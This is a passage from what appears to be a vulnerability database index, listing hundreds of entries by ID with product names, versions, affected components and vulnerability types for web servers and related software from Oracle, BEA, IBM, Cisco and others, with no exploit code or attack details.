unknown vulnerability [67102] Oracle Agile Product Collaboration 9.3.3 Web Client unknown vulnerability [67084] Oracle WebLogic Server 12.1.1.0/12.1.2.0 Web Container cross site scripting [67083] Oracle WebLogic Server 10.0.2.0/10.3.6.0 unknown vulnerability [67082] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0 unknown vulnerability [67081] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 Console unknown vulnerability [67076] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 JVM denial of service [67075] Oracle WebLogic Server 10.0.2.0/10.3.6.0 information disclosure [67074] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 denial of service [67073] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0 denial of service [67072] Oracle WebCenter Portal 11.1.1.7/11.1.1.8 Portlet Services unknown vulnerability [67070] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability [67068] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 WLS Core Components unknown vulnerability [67067] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability [67066] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability [67065] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0 Security/Policy unknown vulnerability [67064] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability [67063] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability [67062] Oracle WebCenter Portal 11.1.1.7.0/11.1.1.8.0 Portlet Services information disclosure [67061] Oracle iPlanet Web Server 6.1/7.0 Security Numeric Error [67060] Oracle iPlanet Web Proxy Server 4.0.24 Security Numeric Error [67047] Cisco WebEx Meetings Server memory corruption [67041] Cisco WebEx Meetings Server 2.0.1/2.5.0 File Transfer privilege escalation [22166] EFS Easy File Sharing Web Server 1.25 HTTP Request denial of service [22165] EFS Easy File Sharing Web Server 1.25 HTTP Request disk_c information disclosure [22084] IBM Websphere Caching Proxy Server 5.02 HTTP GET denial of service [22077] Fastream NETFile FTP/Web Server up to 6.7.2.1085 Floppy Drive Hang denial of service [22076] Fastream NETFile FTP/Web Server up to 6.7.2.1085 directory traversal [22045] Webmin/Usermin 1.070/1.140 Account Lockout weak authentication [21992] Shawn Webb Webbsyte Chat 0.9.0 Connection denial of service [21922] BEA WebLogic Server up to 8.1 SP2 Access Restriction SecurityRoleAssignmentMBean.toXML privilege escalation [21887] Oracle Application Server Web Cache 9.0.0.4.0/9.0.2.3.0/9.0.3.1.0/9.0.4.0.0 HTTP Request Method memory corruption [21815] Aldo Vargas Aldos Web Server 1.5 HTTP GET Request directory traversal [21797] DiGi Web Server HTTP GET Request denial of service [21775] FaSTream Netfile Ftp Web Server 6.5.1.980 Login denial of service [21657] Sun Java System Application Server up to 7.0 SOAP Web Service denial of service [21656] Sun One Application Server 6.0 SOAP Web Service denial of service [21637] Aldo Vargas Aldos Web Server 1.5 Path information disclosure [21516] WildTangent WebDriver 4.0 WTHoster/WebDriver strcat memory corruption [21511] Reptile Web Server 2002-01-05 GET Request denial of service [21508] Leif M. Wright Web Blog 1.1 directory traversal [21455] Novell GroupWise 6.0 Sp3 WebAccess unknown vulnerability [21427] PSCS VPOP3 Web Mail Server 2.0e/2.0f admin/index.html cross site scripting [21357] BEA WebLogic Server up to 7.0.0.1 In-Memory Session Replication race condition [21304] Logicworks WEB-ERP up to 0.1.4 HTTP Request logicworks.ini Password privilege escalation [21287] Aprelium Abyss Web Server up to 1.1.3 HTTP GET Request privilege escalation [21261] Aprelium Abyss Web Server up to 1.1.2 HTTP privilege escalation [21260] Aprelium Abyss Web Server up to 1.1.2 HTTP GET Request memory corruption [21246] Twilight Webserver 1.3.3.0 GET Request denial of service [21228] Easy File Sharing Web Server 1.2 option.ini Password information disclosure [21227] Easy File Sharing Web Server 1.2 denial of service [21183] NX Web Content Management System 2002 Prerelease1 URL mass_operations.inc.php privilege escalation [21155] BEA WebLogic Server up to 8.1 SP1 Node Manager denial of service [21154] BEA WebLogic Server up to 8.1 SP1 Java Message Service config.xml Password information disclosure [21153] BEA WebLogic Server up to 8.1 SP1 T3 over SSL weak encryption [21141] BDC Web Wiz Forums up to 7.5 post_message_form.asp privilege escalation [21126] Plug And Play Web Server 1.0002c FTP Service memory corruption [21055] Cherokee Web Server up to 0.4.5 POST Request connection.c denial of service [21041] SAP Database Server up to 7.4.03.29 Web-Tools privilege escalation [21039] SAP Database Server up to 7.4.03.29 Web-Tools privilege escalation [21038] SAP Database Server up to 7.4.03.29 Web-Tools waadmin.wa memory corruption [21037] SAP Database Server up to 7.4.03.29 Web-Tools waadmin.wa privilege escalation [21014] BEA WebLogic Server up to 8.1 InteractiveQuery.jsp cross site scripting [20947] Truenorth IA WebMail Server 3.1.0 GET Request memory corruption [20923] Plug And Play Web Server Proxy 1.0002c GET Request denial of service [20917] Telcondex Simplewebserver 2.12.30210 Build3285 Header memory corruption [20890] phpWebSite 0.9.0 Calendar Module Format String [20889] phpWebSite 0.9.0 Pear Library TimeZone.php localtime Path information disclosure [20888] phpWebSite 0.9.0 cross site scripting [20887] phpWebSite 0.9.0 Calendar Module sql injection [20885] BEA WebLogic Server up to 7.0 Servlet Container/Console Application cross site scripting [20815] Microsoft Windows Distributed Component Object Model Interface memory corruption [20790] BEA WebLogic Server NodeManager privilege escalation [20782] Oracle E-Business Suite up to 11.5.8 Web Report Review FNDWRR.exe memory corruption [20748] Cisco IOS 12.2 on Aironet Web Server denial of service [20637] Ashley Brown iWeb Server Encoded URL directory traversal [20636] Ashley Brown iWeb Server HTTP Request directory traversal [20553] Snowblind Web Server 1.0 HTTP Request memory corruption [20552] Snowblind Web Server 1.0 URL denial of service [20551] Snowblind Web Server 1.0 HTTP Request directory traversal [20550] Snowblind Web Server 1.0 HTTP Request directory traversal [20526] Francisco Burzi PHP-Nuke 5.0/6.0 Web_Links index.php viewlink sql injection [20469] MyWebServer 1.0.2 Error Message Path information disclosure [20360] Novell NetWare 5.1/6.0 Web Handler for Perl Version information disclosure [20359] Novell NetWare 5.1/6.0 Web Handler for Perl directory traversal [20358] Novell NetWare 5.1/6.0 Web Handler for Perl privilege escalation [20325] IBM Lotus Domino Web Server up to 6.0.0 nhttp.exe s_Validation denial of service [20324] IBM Lotus Domino Web Server up to 6.0.0 nhttp.exe h_PageUI denial of service [20323] IBM Lotus Domino Web Server up to 6.0.1 COM Object Control Handlerl memory corruption [20322] IBM Lotus Domino Web Server up to 6.0.0 memory corruption [20286] Radiobird Software Webserver 4 Everyone 1.22 URL directory traversal [20246] Juniper Netscreen ScreenOS up to 4.0.0r6 Secure Command Shell Management Interface denial of service [20235] Symantec Raptor Firewall 6.5/6.5.2 Secure Webserver 1.1 privilege escalation [20223] BEA WebLogic Server up to 7.0 Servlet privilege escalation [20204] IBM Lotus Domino up to R4.5 R6 Web Retriever Client memory corruption [20179] Webmin 1.0.50/1.0.60 Base64 Encoded String miniserv.pl weak authentication [20120] Apache Tomcat up to 3.3.1 web.xml privilege escalation [20045] Key Focus KF Web Server 1.0.8 MIME Type directory traversal [20033] Webchat 1.5 on XOOPS index.php sql injection [20030] Inweb Mail Server 2.01 HELO Command memory corruption [20012] SWS Simple Web Server 0.0.3/0.0.4/0.1.0 URL denial of service [20002] Webmin up to 0.990 RPC Module privilege escalation [19960] BlueFace Falcon Web Server up to 2.0.0.1021 404 Error Message cross site scripting [19915] Netdave Webster Http Server URL cross site scripting [19911] Netdave Webster Http Server URL directory traversal [19910] Netdave Webster Http Server URL memory corruption [19906] HP Secure Web Server For Tru64 up to 5.1a IGMP denial of service [19898] pWins Webserver up to 0.2.5 Unicode Character directory traversal [19859] Comscripts Web Server Creator 0.1 index.php/customize.php privilege escalation [19858] Soft3304 04webserver 1.20 URL information disclosure [19843] Webmin 0.99 Printer Administration Module privilege escalation [19831] ActiveXperts ActiveWebserver Link cross site scripting [19820] phpWebSite 0.8.3 IMG Tag article.php cross site scripting [19819] BEA WebLogic Server up to 7.0.0 Request Buffer information disclosure [19794] Software602 Web Server up to 2002.0.02.915 HTTP Request /admin/ privilege escalation [19791] Lucent Access Point Service Router 300 300/600/1500 Administration Interface memory corruption [19788] Savant Webserver 3.1 HTTP Request cgitest.exe denial of service [19787] Savant Webserver 3.1 Encoded URL weak authentication [19784] BEA Weblogic Integration up to 7.0 Servlet 2.3 Specification privilege escalation [19783] BEA WebLogic Server 7.0/7.0.0.1 EJB privilege escalation [19746] Ganglia PHP RRD Web Client 1.0.2 graph.php passthru privilege escalation [19727] WWWeBBB Forum 3.82 Beta HTTP Request page.cgi directory traversal [19707] Webcalendar 0.9.31/0.9.32/0.9.33/0.9.34 Directory information disclosure [19706] PhpWebGallery 1.0 Cookie isadmin.php weak authentication [19656] IBM Lotus Domino 5.0.8 Web Server User information disclosure [19647] Sun Java Web Start 1.0/1.0.1/1.0.1.01/1.0.1_01 privilege escalation [19641] HP Praesidium Webproxy 1.0 on HP-UX privilege escalation [19636] Gamecheats Advanced Web Server Professional 1.030000 HTTP Request advserver.exe denial of service [19593] Goahead Webserver 2.1 GET Request memory corruption [19589] Webmin up to 1.0.00 SSL Key weak encryption [19583] Radiobird Web Server 4 Everyone 1.28 GET Request memory corruption [19549] Telcondex SimpleWebServer 2.06.20817 GET Request denial of service [19539] MyWebServer 1.0.0/1.0.1/1.0.2 HTTP Request memory corruption [19512] SWS Simple Web Server up to 0.1.0 recv privilege escalation [19508] SWS Simple Web Server up to 0.1.0 404 Error Message denial of service [19506] SWS Simple Web Server up to 0.1.0 HTTP Request directory traversal [19501] Orion Application Server 1.5.3 web-inf privilege escalation [19500] Oracle Application Server up to 9.0.2.0.1 on Windows web-inf privilege escalation [19499] Jo Webserver 1.0 Rc1 web-inf privilege escalation [19498] HP Application Server 8.0 web-inf privilege escalation [19497] Macromedia JRun 3.0/3.1/4.0 on Windows web-inf privilege escalation [19471] Savant Webserver 3.1 HTTP GET Request denial of service [19450] phpWebSite 0.8.3 IMG Tag cross site scripting [19300] Netscape Enterprise Server 3.x/4.x Web Publishing Feature denial of service [19222] Microsoft Office Web Components 10 DataSourceControl ConnectionFile information disclosure [19221] Microsoft Office Web Components 10 Spreadsheet File information disclosure [19220] Microsoft Office Web Components 9/10 Chart Load File information disclosure [19190] iPlanet Web Server up to 4.x SP11 Admin Server cross site scripting [19189] iPlanet Web Server up to 4.x SP11 Admin Server cross site scripting [19149] Oracle9i up to Release 2 9.2.2 iSQL Plus Web Application memory corruption [19145] Northern Xeneo Web Server up to 2.1.0.0 Encoded URL denial of service [19140] Peter Sandvik Simple Web Server up to 0.5.1 HTTP Request privilege escalation [19136] Microsoft IIS 5.0/5.1 WebDAV Memory denial of service [19123] IBM Websphere Caching Proxy Server up to 3.6/4.0.1.26 HTTP Request helpout.exe denial of service [19122] IBM Websphere Caching Proxy Server up to 3.6/4.0.1.26 Header cross site scripting [19121] IBM Websphere Caching Proxy Server up to 3.6/4.0.1.26 HTTP GET Request cross site scripting [19104] Radiobird Software Webserver 4 All up to 1.27 URL Encoding directory traversal [19103] Radiobird Software Webserver 4 All up to 1.22 HTTP GET Request memory corruption [19087] Microsoft SQL Server up to 7.0 Stored Procedure xp_runwebtask privilege escalation [19085] Symantec Enterprise Firewall up to 7.0 Web Proxy denial of service [19071] IBM WebSphere Application Server 4.0.3 HTTP Header memory corruption [19065] HP Procurve Switch 4000M up to C.09.15 HTTP Administration Interface denial of service [19038] phpWebSite 0.8.2 modsecurity.php Source information disclosure [19036] Funsoft Dinos Webserver 2.1 Encoded URL directory traversal [19012] Cisco VPN 3000 Concentrator up to 3.5.2 HTML Login Interface denial of service [19005] Cisco VPN 3000 Concentrator up to 3.0.3 HTML Interface denial of service [18993] Aprelium Technologies Abyss Web Server 1.0.3 Administration Console File information disclosure [18992] Aprelium Technologies Abyss Web Server up to 1.0.2 Administration Console srvstatus.chl privilege escalation [18991] Aprelium Technologies Abyss Web Server 1.0.3 directory traversal [18990] Aprelium Technologies Abyss Web Server 1.0.3 HTTP Request Directory information disclosure [18989] Ipswitch IMail up to 7.1 Web Calendaring Service denial of service [18979] T. Hauck Jana Web Server up to 1.4.6 POP3 Server memory corruption [18978] T. Hauck Jana Web Server up to 1.4.6/2.2.1 Authentication weak authentication [18977] T. Hauck Jana Web Server up to 1.4.6/2.2.1 User information disclosure [18976] T. Hauck Jana Web Server up to 1.4.6/2.2.1 FTP Server denial of service [18975] T. Hauck Jana Web Server up to 1.4.6/2.2.1 memory corruption [18974] T. Hauck Jana Web Server up to 1.4.6/2.2.1 HTTP memory corruption [18956] Sun One Web Server 4.1 SP9/6.0 SP2 Search Engine directory traversal [18954] IBM AIX 4.x WebSecure Configuration Utility unknown vulnerability [18946] Key Focus KF Web Server up to 1.0.5 HTTP Header memory corruption [18945] Key Focus KF Web Server 1.0.2 HTTP Request File information disclosure [18944] BEA WebLogic Server 5.1.x Performance Pack denial of service [18917] MyWebServer 1.0.1/1.0.2 HTTP GET Request memory corruption [18902] ACI 4D Webserver 6.7.3 HTTP Request memory corruption [18837] BlueFace Falcon Web Server up to 2.0.0.1021 privilege escalation [18797] Savant Web Server up to 3.1 GET Request memory corruption [18777] Microsoft Project 2000/2002 Office Web Components Copy/Paste privilege escalation [18776] Microsoft Project 2000/2002 Office Web Components LoadText File information disclosure [18774] Microsoft Project 2002 Office Web Components setTimeout privilege escalation [18728] MyWebServer 1.0.2 Error Message cross site scripting [18727] MyWebServer 1.0.2 memory corruption [18721] Iplanet Web Server 4.1 Chunked Encoding Transfer memory corruption [18673] Critical Path Injoin Directory Server 4.0 iCon Administrative Web Server cross site scripting [18672] Critical Path Injoin Directory Server 4.0 iCon Administrative Web Server information disclosure [18670] Lysias Lidik Webserver 0.7b Web Server directory traversal [18643] Webmin/Usermin 0.96 Authentication weak authentication [18642] Webmin/Usermin 0.96 Error cross site scripting [18549] Apache Tomcat Security web.xml 7PK Security Features [18498] Microsoft IIS 5.0/5.1 WebDAV IP Address information disclosure [18468] Xerver Web Server up to 2.10 HTTP Request denial of service [18467] Xerver Web Server up to 2.10 GET Request directory traversal [18429] Iplanet Web Server 4.1 memory corruption [18425] Goahead Webserver 2.1.1/2.1.2/2.1.3/2.1.4/2.1.5 404 Error Message cross site scripting [18424] Goahead Webserver 2.1.1/2.1.2/2.1.3/2.1.4/2.1.5 Encoded URL directory traversal [18376] Deep Forest Software Quik-Serv Webserver 1.1B URL directory traversal [18375] IBM Informix Web Datablade 4.12 Escape sql injection [18374] IBM Informix Web Datablade 4.12 webdriver sql injection [18363] Aprelium Technologies Abyss Web Server up to 1.0.0.1 URL Encoding directory traversal [18326] Novell GroupWise 5.5 HTTP Request GWWEB.EXE Path information disclosure [18308] Nombas Scriptease Webserver URL comment2.jse File information disclosure [18298] Essen Essentia Web Server 2.1 URL memory corruption [18297] Essen Essentia Web Server 2.1 URL directory traversal [18275] WebTrends Reporting Center 4.0d GET Request get_od_toc.pl Path information disclosure [18274] WebTrends Reporting Center 4.0d GET Request WTRS_UI.EXE memory corruption [18257] ACI 4D Webserver 6.7.3 Basic Authentication memory corruption [18242] Caldera OpenUnix 8.0 webtop service_action.cgi privilege escalation [18229] Nombas ScriptEase Webserver 0.95 GET Request denial of service [18228] Nombas ScriptEase Webserver 0.95 URL memory corruption [18222] Funsoft Dinos Webserver 1.2 HTTP Request memory corruption [18220] Bbshareware.com Phusion Webserver 1.0 HTTP Request memory corruption [18219] Bbshareware.com Phusion Webserver 1.0 directory traversal [18206] BlueFace Falcon Web Server up to 2.0.0.1020 Authentication privilege escalation [18162] Netgear RT311/RT314 3.22 Administration Interface cross site scripting [18143] Oracle Application Server Web Cache 2.0.0.2 memory corruption [18107] Cyberstop Web Server 0.1 GET Request memory corruption [18106] Cyberstop Web Server 0.1 MS DOS Device Name denial of service [18021] MDG 4D Webserver 3.5.3 URL directory traversal [18020] MDG 4D Webserver up to 3.5.3 HTTP Request memory corruption [18008] Funsoft Dinos Webserver up to 1.2 URL directory traversal [18003] BEA WebLogic Server 6.1 MS DOS Device Name denial of service [17999] Oracle Application Server Web Cache 2.0.0.x TCP Request denial of service [17996] Michael Lamont Savant Webserver 3.0 HTTP Request Encoding memory corruption [17936] Goahead Webserver up to 2.1.7 Source information disclosure [17912] Novell Web Server 2.0 Examples Toolkit files.pl privilege escalation [17899] Nombas Scriptease Webserver up to 5.0 viewcode.jse directory traversal [17831] Macromedia JRun 3.1 JavaServer Pages WEB-INF/META-INF privilege escalation [17789] Cherokee httpd up to 0.2.7 Web Server directory traversal [17751] Webmin 0.91 edit_action.cgi directory traversal [17738] IBM Tivoli Secureway Policy Director 3.8 WebSeal denial of service [17705] Lotus Domino Web Server 5.x Default Navigator information disclosure [17694] Oracle Application Server Web Cache 2.0.0.1 GET Request memory corruption [17662] Microsoft Exchange 5.5 Outlook Web Access privilege escalation [17618] IBM Informix Web Datablade up to 4.12 ifx directory traversal [17604] Microsoft IIS 3.0/4.0/5.0 Web Log Entry weak authentication [17571] Microsoft Exchange 5.5 Outlook Web Access User information disclosure [17524] Trend Micro Interscan Webmanager 1.2 Manager HttpSave.dll memory corruption [17511] Iplanet Web Server up to 4.1 HTTP Method memory corruption [17510] Iplanet Web Server up to 4.1 URI memory corruption [17507] OReilly Webboard 4.10.30 Paging denial of service [17494] Novell GroupWise 5.5/6.0 webacc directory traversal [17491] Ipswitch IMail 6.0.2/6.0.6/7.0.4 Web Calendar memory corruption [17485] Ipswitch IMail 6.0.2/6.0.6/7.0.4 Web Messaging Server privilege escalation [17408] WebTrends Enterprise Reporting Server 3.1c/3.5 URL privilege escalation [17370] Microsoft IIS 5.0 WebDAV denial of service [17367] IBM WebSphere Commerce Suite up to 3.53 Session ID Cookie weak authentication [17277] ACI 4D Webserver 6.5.7 Request directory traversal [17269] Cisco IOS 11/12.0 Management Interface denial of service [17242] Trend Micro Virus Buster up to 3.5.4 cgiWebupdate.exe File information disclosure [17225] Sun iPlanet Web Server 4.x on HP-UX HTTPS Service denial of service [17188] Novell GroupWise 5.5 WebAccess Directory information disclosure [17168] T. Hauck Jana Web Server up to 2.01 MS DOS Device Name /aux denial of service [17167] T. Hauck Jana Web Server up to 1.46 Hex Encoded URL handler directory traversal [17145] Sixhead SIX-webboard 2.01 generate.cgi privilege escalation [17134] Orange Web Server 2.1 GET Request denial of service [17127] Roxen Webserver 2.0/2.1 Encoded URL privilege escalation [17050] Microsoft Exchange 2000/5.5 Outlook Web Access cross site scripting [17036] phpWebSite 0.7.9 Domain privilege escalation [16943] Iplanet iPlanet Web Server 4.x unknown vulnerability [16926] IBM WebSphere Application Server up to 3.1.2 macro.d2w denial of service [16925] IBM WebSphere Application Server 3.1.2 macro.d2w Path information disclosure [16922] Goahead Software Webserver 2.1 HTTP Request /aux denial of service [16919] iPlanet Web Server 4.1 Host Header information disclosure [16917] Microsoft ISA Server 2000 Web Proxy denial of service [16911] vWebServer 1.2.0 URL memory corruption [16910] vWebServer 1.2.0 MS DOS Device Name denial of service [16909] vWebServer 1.2.0 ASP Script Source information disclosure [16901] Netcruiser Web Server up to 0.1.2.8 URL Path information disclosure [16889] K5n Webcalendar up to 0.9.26 privilege escalation [16877] Spencer Christensen Perl Web Server 0.3 URL directory traversal [16866] Sentraweb Indexu 1.0/1.1/2.0beta Authentication weak authentication [16850] Mirabilis ICQ 2000.0b Build3278 WebFront Plug-in denial of service [16805] IBM WebSphere Commerce Suite 4.0.1 Source information disclosure [16804] Micheal Lamont Savant Webserver 3.0 Host Header memory corruption [16794] Sun Javaserver Web Dev Kit 1.0.1 /WEB-INF directory traversal [16762] iPlanet Web Server 4.0 denial of service [16746] IBM WebSphere Plugin on Netscape Enterprise HTTP Request Source information disclosure [16729] Netscape Enterprise Server 3.0/4.0 Web Publishing Feature Directory information disclosure [16709] Microsoft IIS 5.0 WebDAV Request denial of service [16695] Beck IPC IPC@CHIP Embedded-Webserver FTP/Telnet Service weak authentication [16693] Beck IPC IPC@CHIP Embedded-Webserver chipcfg.cgi information disclosure [16692] Beck IPC IPC@CHIP Embedded-Webserver Telnet Service privilege escalation [16691] Beck IPC IPC@CHIP Embedded-Webserver Telnet Server User information disclosure [16689] Beck IPC IPC@CHIP Embedded-Webserver privilege escalation [16687] Beck IPC IPC@CHIP Embedded-Webserver HTTP Request denial of service [16674] IBM Websphere Commerce Suite up to 4.1.1 Report orderdspc.d2w sql injection [16627] Goahead Webserver V.2.0/V.2.1 GET Request directory traversal [16626] Biblioscape Biblioweb Server 2.0 GET Request memory corruption [16625] Biblioscape Biblioweb Server 2.0 GET Request directory traversal [16612] Free Java Web Server 1.0 directory traversal [16610] Macromedia JRun 3.0 /WEB-INF/web.xml information disclosure [16550] IBM WebSphere Application Server 1.3.x Fast Response Cache Accelerator AfpaCache denial of service [16427] BEA WebLogic Server up to 5.1.0 URL memory corruption [16374] Netscreen ScreenOS 1.73 r1/2.1 r6/2.5 r1/2.10 r3 WebUI memory corruption [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16366] WatchGuard SOHO Firewall 1.6/2.1.3 Administration Interface privilege escalation [16274] 24Link Web Server 1.06 GET Request privilege escalation [16254] SonicWALL SOHO Firewall 4.0/5.0 Web Access denial of service [16253] SonicWALL SOHO Firewall 4.0/5.0 Web Server denial of service [16223] BEA WebLogic Server 5.1 Restrictions privilege escalation [16150] Samba 2.0.7 Web Administration Tool denial of service [16149] Samba 2.0.7 Web Administration Tool User information disclosure [16148] Samba 2.0.7 Web Administration Tool weak authentication [16131] Boa Webserver 0.94.8.2 Get Effective Rights Engine directory traversal [16097] Mirabilis ICQ Web Front Server URL guestbook.cgi denial of service [16096] Sun iPlanet Web Server 4.x SHTML Logger memory corruption [16042] Alt-N MDaemon 3.1.1 WebConfig memory corruption [16000] Apache HTTP Server 1.3.12 on SuSE Linux WebDAV Directory information disclosure [15979] IBM WebSphere Application Server 3.0.2 Host Header memory corruption [15973] SCO UnixWare 7.0 scohelphttp Web Server /search97cgi/vtopic directory traversal [15956] Ipswitch IMail 6.00 Web Service denial of service [15953] Sun Java System Web Server up to 2.0 com.sun.server.http.pagecompile.jsp92.jspservlet privilege escalation [15874] Jeremy Arnold Worm Webserver 1.0 URL denial of service [15873] Jeremy Arnold Worm Webserver 1.0 directory traversal [15839] Sun Solaris Answerbook2 up to 1.4.2 dwhttpd Web Server privilege escalation [15838] Sun Solaris Answerbook2 up to 1.4.4 dwhttpd Web Server privilege escalation [15826] BEA WebLogic Server 3.1.8/4.0.4/4.5.1 JSP Servlet privilege escalation [15825] BEA WebLogic Server up to 5.1.x SSI Servlet Source information disclosure [15824] BEA WebLogic Server up to 5.1.x File Servlet /ConsoleHelp/ Source information disclosure [15823] BEA WebLogic Server up to 5.1.x Proxy Plugin memory corruption [15791] IBM WebSphere Application Server 2.0/3.0/3.0.2.1 Invoker Servlet /servlet/file privilege escalation [15790] Roxen Webserver 2.0.x URL privilege escalation [15758] Sun Java System Web Server up to 2.0 JSP Compiler Servlet board.html privilege escalation [15745] Michael Lamont Savant Webserver 2.1/3.0 GET Request privilege escalation [15734] West Street LocalWEB HTTP Server 1.2.0 GET Request denial of service [15687] BEA WebLogic Server up to 5.1.0 URL /file/ privilege escalation [15647] BEA WebLogic Server up to 4.5.1 JSP File Source information disclosure [15645] IBM WebSphere Application Server 3.0.2 JSP File Source information disclosure [15625] Michael Lamont Savant WebServer 2.1 GET Request Source information disclosure [15618] Concatus IMate Webmail Server 2.5 HELO Command memory corruption [15566] Cayman 3220-H DSL Router 1.0 Administration Interface denial of service [15395] Atrium Software Mercur Mail Server 3.20.01 WebView WebMail-Client memory corruption [15392] Oracle Application Server 4.0 on Win NT Web Listener /ows-bin privilege escalation [15388] Netscape Enterprise Server 3.5/3.6 on Solaris Web Publishing /publisher Directory information disclosure [15340] iPlanet Web Server 4.1 HTTP GET denial of service [15316] Zeus Technologies Zeus Web Server up to 3.3.5 String Source information disclosure [15197] National Science Foundation Squid Web Proxy up to 2.2.STABLE5 weak authentication [15127] Webmin up to 0.42 Authentication weak authentication [15107] Michael Lamont Savant WebServer 2.0 URL denial of service [15072] Novell GroupWise 5.2/5.5 gwweb.exe Path information disclosure [15071] Novell GroupWise 5.2/5.5 gwweb.exe directory traversal [14994] Sun Java Webserver privilege escalation [14981] Tektronix Phaser Network Printer 740/750/840/930 Webserver ncl_subjects.html privilege escalation [14957] F5 BIG-IP 2.0 Configuration Interface bigconf.conf privilege escalation [14922] Falcon Falcon Web Server 1.0.0.1006 Path information disclosure [14918] BlueFace Falcon Web Server 1.0.1006 directory traversal [14916] Zeus Technologies Zeus Web Server 3.3.1/3.3.2 Search Engine privilege escalation [14915] IBM WebSphere ikeyman Tool weak encryption [14896] T. Hauck Jana Web Server up to 1.46 directory traversal [14895] T. Hauck Jana Web Server up to 1.46 directory traversal [14894] Roxen Web Server 1.3.11 RXML Parser htmlparse.pike denial of service [14883] Sambar Web Server 4.2.1 HTTP GET memory corruption [14695] Novell NetWare 4.1/4.11 Novell-HTTP-Server/YAWN Web Server denial of service [14596] Mirabilis ICQ 99a 2.13build1700 Webserver directory traversal [14564] Cisco Router 3.2/4.2 Web Server privilege escalation [14553] Ipswitch IMail 5.0/6.0 Web Service memory corruption [14546] Ramp Networks WebRamp Router HTTP Server denial of service [14536] Microsoft Frontpage/Personal Web Server URL privilege escalation [14533] Cisco Router Web Server denial of service [14457] Ramp Networks WebRamp Router M3 Administration privilege escalation [14420] Linux Kernel RPC Interface Configuration [14355] Router Administration Interface weak authentication [14311] Microsoft Windows NT Web Server information disclosure [14309] JavaWebServer CGI Program privilege escalation [13983] Oracle Webserver 1.0/2.1 Permission privilege escalation [13934] Web Server Authentication weak authentication [13885] SGI IRIX up to 6.3 webdist.cgi privilege escalation [13740] Novell Web Server 1.0/2.x convert.bas privilege escalation [13727] NCSA Webserver 1.5 phf privilege escalation [13697] NCSA Webserver 1.3/1.4/1.4.1 memory corruption [13696] NCSA Webserver 1.5c memory corruption [13582] Horde Webmail up to 2.0.5 Horde_ldap weak authentication [13575] Cisco WebEx Meetings Server 1.5 Password privilege escalation [13570] Cisco Email Security/Web Security 8.3 monitor/reports/overview cross site scripting [13477] Cisco WebEx Meeting Server 1.5 p.php User Name privilege escalation [13462] Microsoft Visual Studio 2002/2003/2005/2010 Debug Interface msdia.dll privilege escalation [13406] Cisco ASA up to 8.4.7/9.1.4 WebVPN Login Page /+CSCOE+/logon.html cross site scripting [13382] Usermin/Webmin up to 1.590 Popup Window cross site scripting [13380] cPanel 11.40.1.13/11.42.1.15/11.43.0.11 Interfaces cross site scripting [13351] IBM Sametime Proxy Server 9.0/9.0.0.1 Web Player cross site request forgery [13340] IBM WebSphere Portal 6.1.0/7.0/8.0 googlemap.jsp cross site scripting [13339] IBM WebSphere Portal 6.1.0/7.0/8.0 cross site scripting [13338] IBM WebSphere Portal 6.1.0/7.0/8.0 JSP Include privilege escalation [13337] IBM WebSphere Portal 6.1.0/7.0/8.0 boot_config.jsp cross site scripting [13336] IBM WebSphere Portal 6.1.0/7.0/8.0 FilterForm.jsp cross site scripting [13335] IBM WebSphere Portal 6.1.0/7.0/8.0 Web Access denial of service [13248] IBM WebSphere Application Server up to 6.1.0.47/6.0.2.43 TLS denial of service [13242] Cisco WebEx up to 27.32.31.15/28.12.13.17/29.5.1.11 Event Center meetinginfo.do information disclosure [13175] IBM WebSphere MQ up to 7.5.0.3 TCP Listener inetd denial of service [13174] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 ARF Player memory corruption [13173] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 ARF Player memory corruption [13172] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 WRF Player memory corruption [13171] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 ARF Player memory corruption [13170] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 WRF/ARF Player memory corruption [13105] Cisco WebEx Meetings Server cross site request forgery [13004] Apple CUPS 1.6.4/1.7.1 Interface cross site scripting [12969] Oracle Secure Global Desktop 4.63/4.71/5.0/5.1 Workspace Web Application memory corruption [12966] Oracle Secure Global Desktop 5.0/5.1 Workspace Web Application memory corruption [12898] Oracle Access Manager 11.1.1.5 Webserver Plugin denial of service [12897] Oracle Access Manager up to 11.1.2.2.0 WebGate unknown vulnerability [12890] Oracle WebCenter Portal 11.1.1.7/11.1.1.8 People Connection unknown vulnerability [12882] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 WLS Security unknown vulnerability [12874] Juniper Junos up to 13.3 J-Web index.php Persistent cross site scripting [12873] Juniper Junos up to 12.2 J-Web index.php cross site scripting [12821] Horde Webmail 5.1 Redirect /horde/util/go.php privilege escalation [12816] cPanel 11.38.2/11.40.1/11.42.0 Modify Account Interface privilege escalation [12807] cPanel 11.38.2/11.40.1/11.42.0 wwwacct Interface /scripts5/wwwacct privilege escalation [12783] Cisco Web Security Appliance 7.1.0/7.5/7.7 privilege escalation [12779] Cisco Unity Connection up to 8.6(2)SU3 Web Inbox cross site scripting [12744] IBM WebSphere Portal up to 8.0.0.1 CF10 WCM UI cross site scripting [12743] IBM WebSphere Portal up to 8.0.0.1 CF10 Render Engine cross site scripting [12717] PayPal App 5.3 on Android SSL Certificate WebHybridClient.java weak authentication [12673] Cisco ASA 8.0/9.0 WebVPN Login Page denial of service [12672] Cisco WebEx Meeting Center HTTP GET information disclosure [12637] Webmin up to 1.670 /webminlog/view.cgi Reflected cross site scripting [12616] TP-LINK 